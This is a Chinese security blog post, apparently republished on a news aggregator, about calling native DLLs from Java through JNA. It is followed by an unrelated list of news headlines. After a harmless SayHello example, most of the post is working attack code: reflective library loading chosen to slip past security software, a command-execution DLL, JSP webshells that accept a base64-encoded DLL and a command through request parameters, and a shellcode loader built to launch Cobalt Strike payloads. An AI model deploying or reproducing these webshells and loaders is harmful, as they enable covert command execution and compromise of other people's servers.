我们一起聊聊 JNA 调用动态链接库

2023-05-09 08:24:02 来源: FreeBuf.COM
前言

在一次实际项目中遇到了无法调用exe可执行文件,听说哥斯拉利用JNA技术实现了内存加载exe、执行命令等操作,特来实践一下。


(资料图片)

JNA 基础知识

JNA全称:Java Native Access,是建立在JNI(Java Native Interface)技术之上的Java开源框架,JNA提供了一组Java工具类用于在运行期间动态访问的系统本地库。简单理解就是:JNA提供了一个"桥梁",可以利用Java代码直接访问动态链接库中的函数。

调用JNI接口

调用JNI接口的步骤为:

创建工程,将dll文件放到工程下引入JNA相关的jar包创建继承自Library类的接口接口中创建对象用于加载DLL/SO的类库接口中声明DLL/SO类库头文件中暴露的方法调用该方法编译DLL

以windows为例,使用Visual Studio 创建一个动态链接库的工程,并定义一个头文件testdll.h和源文件testdll.cpp。简单实现一个SayHello的方法创建testdll.cpp,作用是用来实现被声明的函数。

#include "pch.h"#include "testdll.h"void SayHello(){ std::cout << "Hello!你成功了!" << std::endl;}

创建testdll.h头文件,作用是用来声明需要导出的函数接口

#pragma once#include extern "C" __declspec(dllexport) void SayHello();//声明一个可被调用的函数“SayHello()”,它的返回类型是void。//extern "C"的作用是告诉编译器将被它修饰的代码按C语言的方式进行编译//__declspec(dllexport),此修饰符告诉编译器和链接器被它修饰的函数或变量需要从DLL导出

而后编译出dll。注意:要DLL位数要与JDK位数相同,否则无法调用。

导入JAR包

首先创建java工程,可以是普通项目也可以是maven功能。maven 需要导入依赖

net.java.dev.jna jna 5.13.0 net.java.dev.jna jna-platform 5.13.0

普通工程可以在 https://github.com/java-native-access/jna 下载jna jar包和platform jar包并导入。

调用DLL

我们需要继承Library类接口,调用Native类的load方法将我们的testdll.dll加载进来并转换为本地库,而后声明SayHello方法。

public interface Mydll extends Library { Mydll mydll = (Mydll)Native.load("testdll",Mydll.class); void SayHello();}

调用时不需要链接库的后缀,会自动加上。声明SayHello方法时,结合testdll.h头文件,没有返回值为void,也没有需要的数据类型。(需要的话可查找JNA 数据类型对应关系)

然后在主方法里调用SayHello方法

public static void main(String[] args) { Mydll.mydll.SayHello();}

可以看到成功调用了testdll.dll的SayHello方法。

加载动态链接库

在上面的代码中,我们直接利用Native.load将dll转换为本地库,在此之前缺少了加载这一步。常见的加载动态链接库有三种方法:

System.load / System.loadLibraryRuntime.getRuntime().load / Runtime.getRuntime().loadLibrarycom.sun.glass.utils.NativeLibLoader.loadLibrary

在使用时也有一些区别:load接收的是系统的绝对路径,loadLibrary接收的是相对路径。但实际利用过程中肯定是绝对路径优先于相对路径。以Runtime.getRuntime().load为例:

但实际利用可能会被安全软件捕捉。我们反射调用loadLibrary方法。代码来自Java加载动态链接库这篇文章

try { Class clazz = Class.forName("java.lang.ClassLoader"); java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); method.setAccessible(true); method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true); Mydll mydll = (Mydll)Native.load("testdll",Mydll.class); mydll.SayHello();}catch (Exception e){ e.printStackTrace();}场景利用

现在我们想一下具体场景的利用,在此基础上调整我们的代码。

webshell

既然jna加载动态链接库后转换为本地库,可以调用dll的任意方法,那实现一个命令执行应该也是可以的。

#include "pch.h"#include "command.h"#include #include void executeCommand(const char* command) { char psBuffer[128]; FILE* pPipe; if ((pPipe = _popen(command, "r")) == NULL) { exit(1); } while (fgets(psBuffer, 128, pPipe)) { puts(psBuffer); } int endOfFileVal = feof(pPipe); int closeReturnVal = _pclose(pPipe); if (endOfFileVal) { printf("\nProcess returned %d\n", closeReturnVal); } else { printf("Error: Failed to read the pipe to the end.\n"); }}

相应的头文件

#pragma once#include extern "C" __declspec(dllexport) void executeCommand(const char* command);

java代码加载并调用。

import com.sun.jna.Library;import com.sun.jna.Native;public class test {public interface Mydll extends Library { void executeCommand(String command); } public static void main(String[] args) { try { Class clazz = Class.forName("java.lang.ClassLoader"); java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); method.setAccessible(true); method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true); Mydll mydll = (Mydll)Native.load("testdll",Mydll.class); mydll.executeCommand("ipconfig"); }catch (Exception e){ e.printStackTrace(); } }}

成功实现。结合实际利用我们还需要优化一下代码,改成jsp脚本文件。因为com.sun.jna包是第三方包,在实际利用肯定没有。所以这里选择将自己写的代码和jna.jar一块用maven打包为maven02-1.0-SNAPSHOT-jar-with-dependencies.jar试试。

再把test类名修改为show,把dll动态链接库和将要执行的命令作为参数传递进去。现在还差一个加载外部的jar包并调用方法的jsp脚本文件。

<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URL" %><%@ page import="java.net.URLClassLoader" %><% String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar"; URLClassLoader urlClassLoader =null; Class MyTest = null; //通过URLClassLoader加载外部jar urlClassLoader = new URLClassLoader(new URL[]{new URL(path)}); //获取外部jar里面的具体类对象 MyTest = urlClassLoader.loadClass("com.jna.jnatest"); //创建对象实例 Object instance = MyTest.newInstance(); //获取实例当中的方法名为show Method method = MyTest.getMethod("show", String.class,String.class); //传入实例以及方法参数信息执行这个方法 Object ada = method.invoke(instance, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll","whoami");%>

这样用的时候需要向目标服务器手动上传两个文件,jar包和dll文件。我们再进一步优化一下。

<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.net.URL" %><%! private String getFileName(){ String fileName = ""; java.util.Random random = new java.util.Random(System.currentTimeMillis()); String os = System.getProperty("os.name").toLowerCase(); if (os.contains("windows")){ fileName = "C:\\Windows\\Temp\\" + random.nextInt(10000000) + ".dll"; }else { fileName = "/tmp/"+ random.nextInt(10000000) + ".so"; } return fileName; } public String UploadBase64DLL(String base64) throws Exception { sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder(); java.io.File file = new java.io.File(getFileName()); java.io.FileOutputStream fos = new java.io.FileOutputStream(file); fos.write(b.decodeBuffer(base64)); fos.close(); return file.getAbsolutePath(); }%><% try{ String cmd = request.getParameter("cmd"); String base64 = request.getParameter("base64"); String file = UploadBase64DLL(base64); String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar"; //通过URLClassLoader加载外部jar URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)}); //获取外部jar里面的具体类对象 Class MyTest = urlClassLoader.loadClass("com.jna.jnatest"); //创建对象实例 Object instance = MyTest.newInstance(); //获取实例当中的方法名为show,参数只有一个且类型为string的public方法 Method method = MyTest.getMethod("show", String.class,String.class); //传入实例以及方法参数信息执行这个方法 Object ada = method.invoke(instance, file,cmd); } catch (Exception e){ out.println(e); }%>

现在只需要手动上传一个jar包就可以,dll通过base64编码上传上去。这样参数值就是base64编码之后的dll和cmd要执行的系统命令。

唯一的缺点就是不能在前端显示,或许将代码加入到冰蝎可以实现?

shellcode

既然前端无法获取结果,那直接加载shellcode上线cs呢?我们利用同样的方式写出加载shellcode的代码。shellcode.cpp

#include "shellcode.h"#include using namespace std;void shellcode(PCHAR code, DWORD buf_len) { cout << buf_len << endl; DWORD oldprotect = 0; LPVOID base_addr = NULL; // 申请一块buf_len长度大小的空间,RW权限,不要开rwx,PAGE_EXECUTE_READWRITE base_addr = VirtualAlloc(0, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // 复制shellcode到新的空间,这个函数比较罕见,用memcpy也可以呀 unsigned char HexNumArray[4096]; int num = HexStr2HexNum(code, buf_len, HexNumArray); RtlMoveMemory(base_addr, HexNumArray, buf_len); // 修改为执行RX权限 VirtualProtect(base_addr, buf_len, PAGE_EXECUTE_READ, &oldprotect); cout << "starting spawn shellcode" << endl; // 当前进程创建线程执行shellcode auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0); // 等待线程返回值 WaitForSingleObject(ct, -1); // 释放内存 free(base_addr);}int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray){ int j = 0; for (int i = 0; i < len; i += 2) { if (HexStrArray[i] == 0x5C || HexStrArray[i] == 0x58 || HexStrArray[i] == 0x78) { continue; } char HIGH_BYTE = 0; char LOW_BYTE = 0; //high 4 if (HexStrArray[i] >= 0x30 && HexStrArray[i] <= 0x3A) { HIGH_BYTE = HexStrArray[i] - 0x30; } else if (HexStrArray[i] >= 0x41 && HexStrArray[i] <= 0x47) { HIGH_BYTE = HexStrArray[i] - 0x37; } else if (HexStrArray[i] >= 0x61 && HexStrArray[i] <= 0x67) { HIGH_BYTE = HexStrArray[i] - 0x57; } else { printf("Please make sure the format of Hex String is correct!\r\n"); printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i); return -1; } //low 4 if (HexStrArray[i + 1] >= 0x30 && HexStrArray[i + 1] <= 0x3A) { LOW_BYTE = HexStrArray[i + 1] - 0x30; } else if (HexStrArray[i + 1] >= 0x41 && HexStrArray[i + 1] <= 0x47) { LOW_BYTE = HexStrArray[i + 1] - 0x37; } else if (HexStrArray[i + 1] >= 0x61 && HexStrArray[i + 1] <= 0x67) { LOW_BYTE = HexStrArray[i + 1] - 0x57; } else { printf("Please make sure the format of Hex String is correct!\r\n"); printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i); return -1; } HexNumArray[j] &= 0x0F; HexNumArray[j] |= (HIGH_BYTE << 4); HexNumArray[j] &= 0xF0; HexNumArray[j] |= LOW_BYTE; j++; } return 0;}

shellcode.h

#pragma once#include extern "C" __declspec(dllexport) BOOL shellcode(PCHAR code, DWORD size);int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray);

在java里加载并调用,传入shellcode和长度。以达到更好的免杀性。

import java.util.Base64;import com.sun.jna.Library;import com.sun.jna.Native;public class test {public interface Mydll extends Library { void shellcode(byte[] b,int length); } public static void show(String base64,String dllpath,String dllname) { try { Class clazz = Class.forName("java.lang.ClassLoader"); java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); method.setAccessible(true); method.invoke(null, clazz, dllpath, true); Mydll mydll = (Mydll)Native.load(dllname,Mydll.class); byte[] base64decodedBytes = java.util.Base64.getDecoder().decode(base64); int leng = base64decodedBytes.length; mydll.shellcode(base64decodedBytes,leng); }catch (Exception e){ e.printStackTrace(); } }public static void main(String[] args) {String base64encodedString = "XHhmY1x4NDhxxxxxxxxxxxxxxx";show(base64encodedString,"C:\\Windows\\Temp\\jna.dll","jna"); }}

此时只需要将shellcode值base64编码当做字符传递即可。测试一下

可以看到正常上线,进程为javaw.exe。那在实际环境中同样不能这样利用。依旧把java代码打包为jar包,再修改一下jsp脚本文件应该就可以在实际运行了。

<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.net.URL" %><%! private String getFileName(String dllname){ String fileName = ""; String os = System.getProperty("os.name").toLowerCase(); if (os.contains("windows")){ fileName = "C:\\Windows\\Temp\\" + dllname + ".dll"; }else { fileName = "/tmp/"+ dllname + ".so"; } return fileName; } public String UploadBase64DLL(String base64,String dllname) throws Exception { sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder(); java.io.File file = new java.io.File(getFileName(dllname)); java.io.FileOutputStream fos = new java.io.FileOutputStream(file); fos.write(b.decodeBuffer(base64)); fos.close(); return file.getAbsolutePath(); }%><% try{ String shellcode = request.getParameter("shellcode"); String base64dll = request.getParameter("base64dll"); String dllname = request.getParameter("dllname"); String pathdll = UploadBase64DLL(base64dll,dllname); String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar"; URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)}); Class MyTest = urlClassLoader.loadClass("com.jna.jnatest"); Object instance = MyTest.newInstance(); Method method = MyTest.getMethod("show", String.class,String.class,String.class); Object ada = method.invoke(instance,shellcode, pathdll,dllname); } catch (Exception e){ out.println(e); }%>

以tomcat为例,shellcode 即将cobaltstrike的shellcode进行base64编码,base64dll 是base64编码dll动态链接库之后的值,dllname即是dll动态链接库的名称。测试可以正常上线执行命令。上线进程为java.exe。

总结

在学习JNA调用动态链接库的时候,借鉴了很多师傅的思路,但无奈赶不上师傅们的高度,只能用稍微复杂点的办法完善自己的代码,来曲折得实现效果。

参考资料

https://www.bilibili.com/video/BV16t411A7it/?spm_id_from=333.337.search-card.all.click&vd_source=0627d2723fb97773126096556cc98e0dhttps://www.cnblogs.com/happyhuangjinjin/p/17219986.htmlhttps://tttang.com/archive/1436/https://payloads.online/archivers/2022-08-11/1/

本文作者:CSeroad,转载请注明来自FreeBuf.COM

标签:

我们一起聊聊 JNA 调用动态链接库

前言在一次实际项目中遇到了无法调用exe可执行文件,听说哥斯拉利用JNA技术实现了内存加载exe、执行命令等

05-09 08:24:02

加方要求中方一名领事官员限期离境,中使馆:将采取反制措施_环球要闻

驻加拿大使馆发言人就加方要求中方一名领事官员限期离境发表谈话5月8日,加拿大政府基于个别政客和媒体所谓

05-09 07:54:49

天天亮点!太猛了!刚加盟公募巨头 就管理160亿,有何来头?基金圈跳槽新现象

尘埃落定!去年9月底从工银瑞信基金离职的基金经理王君正,正式在新东家华夏基金携“百亿基金”亮相。根...

05-09 07:52:41

民法典交通事故起诉有时间限制吗?

交通事故的诉讼时效为三年,相关规定如下:向人民法院请求保护民事权利的诉讼时效期间为三年。法律另有规定

05-09 06:43:00

百事通!孙悟空的脸一一-歇后语 ldquo 孙悟空的脸 rdquo 后半句是什么

1、歇后语:孙悟空的脸——说变就变。2、释义:变化无常;转眼就变。3、更多相关歇后语:1,孙猴子的尾...

05-09 05:57:44

需求回暖,多层陶瓷电容器出货量大增!企业纷纷发布产品涨价函|每日快报

多层陶瓷电容器(MLCC)是电子工业用量最多的元器件之一。受下游需求不振影响,前两年,MLCC的出货价格持续下

05-09 04:45:20

【天天时快讯】小清新背景图_清新唯美的电影

1、《向左走。2、向右走》《路边野餐》《蓝色大门》《小武》《苏州河》等等。以上就是【小清新背景图,清新

05-09 01:55:47

世界快播:二维码和一维码的区别-二维码和一维码有什么区别

1、区别是范围不同。2、一维条码扫描枪只能扫描一维条码,而不能扫描二维条码,而二维条码扫描枪既可以扫描

05-08 23:59:08

2023年6月几号是芒种节气 芒种是吉利日子吗 当前观点

2023年6月几号是芒种节气?芒种是吉利日子吗?时光如箭,日月如梭,转眼间已经到了农历四月。小编知道您关

05-08 22:20:31

光启技术:控股股东及其一致行动人近期合计减持1.02%公司股份

光启技术5月8日公告,当日,公司收到控股股东西藏映邦及其一致行动人光启空间的《关于股份减持计划进展情况

05-08 21:52:18

当前焦点!投诉快递最狠的方法_需要怎么操作

投诉快递最狠的方法,需要怎么操作很多人还不知道,现在让我们一起来看看吧!解答:1、搜索官网,国家邮政

05-08 20:54:00

天天头条:宝钢股份股票

本文内容是由小编为大家搜集关于宝钢股份股票,以及的资料,整理后发布的内容,让我们赶快一起来看一下吧!

05-08 20:07:00

共享单车升级空间广阔-世界今头条

一段时间以来,共享单车的出现有效解决了传统交通服务市场中“打车难”和“最后一公里”的困境,极大地...

05-08 19:24:27

环球热讯:吉利汽车4月销量约11.36万辆 完成全年销量目标26.43%

5月8日,吉利汽车发布4月产销数据。数据显示,4月,吉利汽车总销量为11 36万辆,较去年同期增长约58%。1~4

05-08 18:50:31

实时焦点:总投资526.1亿元!许昌市第八期“三个一批”活动举行

河南日报客户端记者王平宋广军5月8日,河南省第八期“三个一批”活动举行。许昌市分会场同步开展了集中...

05-08 18:26:59

楚江新材:顶立科技2021年完成了老厂区土地、建筑物、设备等收储,确认了处置收益

楚江新材(002171)05月08日在投资者关系平台上答复了投资者关心的问题。

05-08 17:47:06

当前速讯:咸丰狮子岩村:打造2.7公里花海长廊助推农旅融合发展

咸丰狮子岩村:打造2 7公里花海长廊助推农旅融合发展---湖北日报客户端讯(通讯员杜迪纳尹卓瑞游芳)5月7日

05-08 17:07:58

第十二届吴文俊人工智能科学技术奖颁奖典礼揭晓_天天观速讯

5月6日上午,第十二届吴文俊人工智能科学技术奖颁奖典礼在北京举行,60个获奖项目及个人受到表彰奖励。西安

05-08 16:57:15

焦点讯息:2023年4月中型车投诉指数排行:限时降价引老车主不满

近期,汽车门网公布了2023年4月份投诉数据,中型车投诉指数为1473 5,环比下跌了25%。整体来看,中型车投诉

05-08 16:14:17

美国一高中浣熊成灾:在走廊来回跑 从天花板掉落吓坏学生-焦点资讯

浣熊(资料图)海外网5月8日电据美国福克斯新闻网站5月7日报道,美国得克萨斯州一所高中长期受到浣熊侵扰,

05-08 15:50:06

动态焦点:东方电热:预测下半年部分大圆柱电池产线量产并形成实际预镀镍材料需求,明年会大批量供货

东方电热近日在业绩说明会上表示,预镀镍项目市场推广正在有序稳步进进当中。公司老产线生产的预镀镍材料20

05-08 14:59:53

【世界独家】英国经济学家罗思义:搞砸中英“黄金时代”,英国一些政客太愚蠢

【环球时报报道记者陈青青白云怡】“英国一些政客把台湾问题国际化的论调非常愚蠢。”英国伦敦经济与商...

05-08 14:10:03

焦点观察:佳发教育5月8日打开涨停

以下是佳发教育在北京时间5月8日13:52分盘口异动快照:5月8日13点52分,佳发教育盘中打开涨停,现报20 84元

05-08 13:57:58

杭州购二套房无需落户满5年?回应来了

杭州购二套房无需落户满5年?回应来了,限购,落户,杭州,王进,商品住房

05-08 12:55:46

电瓶怎么修复最快_电瓶怎么修复_全球要闻

1、可以采用化学修复法,方法是:倒掉原电解液,加入纯水与硫酸钠、硫酸钾、酒石酸等物质混合液,采取正常

05-08 12:28:51

【天天新要闻】咸安区人社局赴宜昌市点军区考察学习

咸安区人社局赴宜昌市点军区考察学习

05-08 11:51:31

中梁天阙府在坟地上_中梁天御一区

1、中梁天御一区位于苏州市姑苏平江新城,由苏州金梁置业有限公司建成,总建筑面积259978,总占地面积86590

05-08 11:57:07

当前快看:一般刚交的首付房能退款吗

一、一般刚交的首付房能退款吗一般刚交的首付房能退款,退房即解除购房合同,需要依照合同商定好的停止处置

05-08 11:17:00

环球看热讯:位列全国前十 厦门法治政府建设交出优秀答卷

中国法治政府评估报告出炉,厦门位列前十我市法治政府建设交出优秀答卷在政府职能依法全面履行等10个方面得

05-08 11:08:26

五年生存率提高 分析_五年生存率_每日速递

1、在临床上,经常会听到医生向病人及家属交代病情时会提到五年生存率生存率的定义生存率是指恶性肿瘤患者

05-08 10:43:08

高性价比复印纸 天章80g A4纸秒杀价84.6元 环球热闻

新橙天章80gA4高性价比复印纸,目前京东秒杀价84 6元,属于近期超值好价,值得推荐。这款A4复印纸,采用进

05-08 10:09:24

柠檬水夏天喝好还是冬天喝好?柠檬水放多久不可以喝了?

柠檬水夏天喝好还是冬天喝好柠檬水夏天喝较好。夏天气温较高,柠檬水能有效刺激胃液的代谢,提高胃口,可以

05-08 09:40:58

Jony Ive 眼中近乎完美的设计是怎样的?|观速讯

苹果前首席设计官JonyIve所谈论的,是他离开苹果后创立的设计公司LoveFrom的同名字体。他有多喜欢这个设计

05-08 09:01:20

今日视点:汇创达:5月5日获融资买入101.09万元

同花顺数据中心显示,汇创达5月5日获融资买入101 09万元,占当日买入金额的5 79%,当前融资余额7068 26万元

05-08 08:52:39

民生证券给予紫燕食品推荐评级 当前观点

民生证券05月07日发布研报称,给予紫燕食品(603057 SH,最新价:27 59元)推荐评级。评级理由主要包括:1

05-08 08:14:34

天天播报:服用降压药后的注意事项

黄智伟主治医师中国医学科学院阜外医院病情分析:首先需要注意每天监测患者的血压,服用降压药物之后,

05-08 07:13:03

焦点快看:何其金家族拟10.53亿元入主会畅通讯 其人疑与波司登创始人关系密切

每经记者:曾剑每经编辑:文多会畅通讯(SZ300578,股价21 08元,市值42 23亿元)实际控制人面临变化。公司

05-08 06:02:09

淄博烧烤爆红后 啤酒上市公司也火了_世界聚看点

xgplayer-skin-default xgplayer-volume{display:none;} xgp

05-08 04:57:15

投资者减除费用是什么意思呢_投资者减除费用是什么意思

1、目前买入和卖出都需要交纳手续费。2、这些费用包括:印花税——成交金额的0 2%,国家收取,全国统一...

05-08 01:57:39

焦点信息:vivo账户登录找回手机_vivo账户登录

1、您好!请问不能登录账号有什么提示呢?您重新申请一个账号登录试试的哦。2、您也可以进入手机设置--更多

05-07 22:52:04

40岁妇女崇拜美国女星,20年动刀百次,上节目公布整容前后照片!

如今的田崎绘里香不仅眉骨和颧骨突出,面部肌肉肉眼可见的僵硬,就连眼睛与眉骨之间的距离也只剩下不足一根

05-07 22:00:32

两大可商用开源大模型同时发布!性能不输LLaMA,羊驼名字不够了

梦晨发自凹非寺量子位|公众号QbitAI从Meta的LLaMA发展出的羊驼家族一系列大模型,已成为开源AI重要力量。但

05-07 20:48:08

环球观焦点:脂溶性激素有哪些_什么是激素敏感性脂肪酶

1、激素敏感性脂肪酶就是一种酶,也叫甘油三酯脂肪酶,对多种激素敏感。2、活性受多种激素的调节,胰岛素能

05-07 19:56:13

环球即时看!ask sb do sth造句_ask sb do sth

1、意思是:问某人如何做某事。2、例句:IaskedMikehowtodothistask 。本文到此分享

05-07 18:45:26

基层“变通”缘何变少了?背后潜藏着干部三种心态

基层干部处于政策执行的“最后一公里”,不少工作都需要面对面应对、一事一议解决、因时因地灵活处理。...

05-07 17:39:00

【热闻】鹌鹑养殖方法_鹌鹑养殖技术说明

欢迎观看本篇文章,小勉来为大家解答以上问题。鹌鹑养殖方法,鹌鹑养殖技术说明很多人还不知道,现在让我们

05-07 16:59:09

表格函数round是什么意思_函数round是什么意思 环球微动态

1、round函数是EXCEL中的一个基本函数,作用按指定的位数对数值进行四舍五入,round函数的语法是ROUND(n

05-07 16:00:38

全球快讯:6.5m级双护盾硬岩掘进机在浙江温州始发

3月24日上午10点,随着刀盘缓缓旋转推进,浙江省水利项目首台6 5m级TBM“奋进号”——长达150米的硬岩...

05-07 14:53:53

2023年度中国电影总票房突破200亿-环球百事通

据灯塔专业版数据,截至5月7日10时40分,2023年度大盘票房(含预售)突破200亿元。其中《满江红》以45 4亿元

05-07 13:54:49

全国游泳冠军赛落幕 孙佳俊50米蛙泳超亚洲纪录

新华社杭州5月6日电(记者夏亮、周欣、李嘉)2023年“韵味杭州”全国游泳冠军赛6日迎来收官战,湖北队孙...

05-07 12:57:01

加方要求中方一名领事官员限期离境,中使馆:将采取反制措施_环球要闻
天天亮点!太猛了!刚加盟公募巨头 就管理160亿,有何来头?基金圈跳槽新现象
民法典交通事故起诉有时间限制吗?
百事通!孙悟空的脸一一-歇后语 ldquo 孙悟空的脸 rdquo 后半句是什么
需求回暖,多层陶瓷电容器出货量大增!企业纷纷发布产品涨价函|每日快报
【天天时快讯】小清新背景图_清新唯美的电影
世界快播:二维码和一维码的区别-二维码和一维码有什么区别
2023年6月几号是芒种节气 芒种是吉利日子吗 当前观点
光启技术:控股股东及其一致行动人近期合计减持1.02%公司股份
当前焦点!投诉快递最狠的方法_需要怎么操作
天天头条:宝钢股份股票
共享单车升级空间广阔-世界今头条
环球热讯:吉利汽车4月销量约11.36万辆 完成全年销量目标26.43%
实时焦点:总投资526.1亿元!许昌市第八期“三个一批”活动举行
楚江新材:顶立科技2021年完成了老厂区土地、建筑物、设备等收储,确认了处置收益
当前速讯:咸丰狮子岩村:打造2.7公里花海长廊助推农旅融合发展
第十二届吴文俊人工智能科学技术奖颁奖典礼揭晓_天天观速讯
焦点讯息:2023年4月中型车投诉指数排行:限时降价引老车主不满
美国一高中浣熊成灾:在走廊来回跑 从天花板掉落吓坏学生-焦点资讯
动态焦点:东方电热:预测下半年部分大圆柱电池产线量产并形成实际预镀镍材料需求,明年会大批量供货
【世界独家】英国经济学家罗思义:搞砸中英“黄金时代”,英国一些政客太愚蠢
焦点观察:佳发教育5月8日打开涨停
杭州购二套房无需落户满5年?回应来了
电瓶怎么修复最快_电瓶怎么修复_全球要闻
【天天新要闻】咸安区人社局赴宜昌市点军区考察学习
中梁天阙府在坟地上_中梁天御一区
当前快看:一般刚交的首付房能退款吗
环球看热讯:位列全国前十 厦门法治政府建设交出优秀答卷
五年生存率提高 分析_五年生存率_每日速递
高性价比复印纸 天章80g A4纸秒杀价84.6元 环球热闻
柠檬水夏天喝好还是冬天喝好?柠檬水放多久不可以喝了?
Jony Ive 眼中近乎完美的设计是怎样的?|观速讯
今日视点:汇创达:5月5日获融资买入101.09万元
民生证券给予紫燕食品推荐评级 当前观点
天天播报:服用降压药后的注意事项
焦点快看:何其金家族拟10.53亿元入主会畅通讯 其人疑与波司登创始人关系密切
淄博烧烤爆红后 啤酒上市公司也火了_世界聚看点
投资者减除费用是什么意思呢_投资者减除费用是什么意思
焦点信息:vivo账户登录找回手机_vivo账户登录
40岁妇女崇拜美国女星,20年动刀百次,上节目公布整容前后照片!
两大可商用开源大模型同时发布!性能不输LLaMA,羊驼名字不够了
环球观焦点:脂溶性激素有哪些_什么是激素敏感性脂肪酶
环球即时看!ask sb do sth造句_ask sb do sth
基层“变通”缘何变少了?背后潜藏着干部三种心态
【热闻】鹌鹑养殖方法_鹌鹑养殖技术说明
表格函数round是什么意思_函数round是什么意思 环球微动态
全球快讯:6.5m级双护盾硬岩掘进机在浙江温州始发
2023年度中国电影总票房突破200亿-环球百事通
全国游泳冠军赛落幕 孙佳俊50米蛙泳超亚洲纪录
焦点速看:拉塞尔谈詹姆斯开局慢热:他以一种你可能看不到的方式领导着球队
X 广告
资讯
X 广告

Copyright ©  2015-2022 起点畜牧网版权所有  备案号:皖ICP备2022009963号-12   联系邮箱: 39 60 29 14 2@qq.com